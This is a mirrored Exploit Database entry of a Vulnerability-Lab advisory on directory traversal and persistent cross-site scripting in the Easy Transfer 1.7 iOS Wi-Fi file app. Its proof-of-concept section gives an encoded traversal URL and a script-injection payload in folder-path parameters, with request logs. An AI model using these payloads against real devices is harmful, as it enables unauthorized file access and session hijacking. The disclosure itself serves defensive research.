Easy Transfer 1.7 for iOS – Directory Traversal

• Exploit Database
• 128 阅读

• 作者： Vulnerability-Lab
  日期： 2020-04-29
• 类别：

  • webapps
  平台：

  • ios
• 来源：https://www.exploit-db.com/exploits/48395/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188

  # Title: Easy Transfer 1.7 for iOS - Directory Traversal # Author: Vulnerability Laboratory # Date: 2020-04-27 # Software: https://apps.apple.com/us/app/easy-transfer-wifi-transfer/id1484667078 # CVE: N/A   Document Title: =============== Easy Transfer v1.7 iOS - Multiple Web Vulnerabilities     References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2223     Common Vulnerability Scoring System: ==================================== 7.1     Affected Product(s): ==================== Rubikon Teknoloji Product: Easy Transfer v1.7 - iOS Mobile Web-Application (Copy of the Homepage: https://apps.apple.com/us/app/easy-transfer-wifi-transfer/id1484667078 )     Vulnerability Disclosure Timeline: ================================== 2020-04-27: Public Disclosure (Vulnerability Laboratory)     Technical Details & Description: ================================ 1.1 A directory traversal web vulnerability has been discovered in the Easy Transfer Wifi Transfer v1.7 ios mobile application. The vulnerability allows remote attackers to change the application path in performed requests to compromise the local application or file-system of a mobile device. Attackers are for example able to request environment variables or a sensitive system path.   The directory-traversal web vulnerability is located in the main application path request performed via GET method. Attackers are able to request for example the local path variables of the web-server by changing the local path in the performed request itself. In a first request the attack changes the path, the host redirects to complete the adress with "..". Then the attacker just attaches /.. a final slash to its request and the path can be accessed via web-browser to download or list local files.   Exploitation of the directory traversal web vulnerability requires no privileged web-application user account or user interaction. Successful exploitation of the vulnerability results in information leaking by unauthorized file access and mobile application compromise.     1.2 Multiple persistent cross site scripting vulnerability has been discovered in the Easy Transfer Wifi Transfer v1.7 ios mobile application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise the mobile web-application from the application-side.   The persistent vulnerabilities are located in the <code>Create Folder</code> and Move/Edit</code> functions. Attackers are able to inject own malicious script codes to the <code>oldPath</code>, <code>newPath</code> and <code>path</code> parameters. The request method to inject is POST and the attack vector is located on the application-side.   Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules.   Request Method(s): [+] POST   Vulnerable Module(s): [+] Create Folder [+] Move/Edit   Vulnerable Parameter(s): [+] oldPath [+] newPath [+] path     Proof of Concept (PoC): ======================= 1.1 The directory traversal web vulnerability can be exploited by remote attackers with wifi network access without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.     PoC: Exploitation http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../   [{"path":"/../../../../../../../../../../../../../../../../../../../../../../../../../../../test/","name":"test"}]     --- PoC Session Logs [GET] --- (list) http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../ Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive - GET: HTTP/1.1 200 OK Content-Length: 213 Content-Type: application/json Connection: Close     1.2 The persistent input validation web vulnerabilities can be exploited by remote attackers with wifi network access with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.     PoC: Exploitation <scriptx00>alert(document.domain)</script>     --- PoC Session Logs [POST] --- (Create & Move) http://localhost/create Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 47 Origin: http://localhost Connection: keep-alive Referer: http://localhost/ path=/test<scriptx00>alert(document.domain)</script> - POST: HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 2 Content-Type: application/json Connection: Close - http://localhost/move Host: localhost Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 69 Origin: http://localhost Connection: keep-alive Referer: http://localhost/ oldPath=/test/<scriptx00>alert(document.domain)</script>&newPath=/test<scriptx00>alert(document.domain)</script> - POST: HTTP/1.1 200 OK Content-Length: 411 Content-Type: text/html; charset=utf-8 Connection: Close - [GET] (Execution) http://localhost/evil.source Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive Referer: http://localhost/     Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.     -- VULNERABILITY LABORATORY - RESEARCH TEAM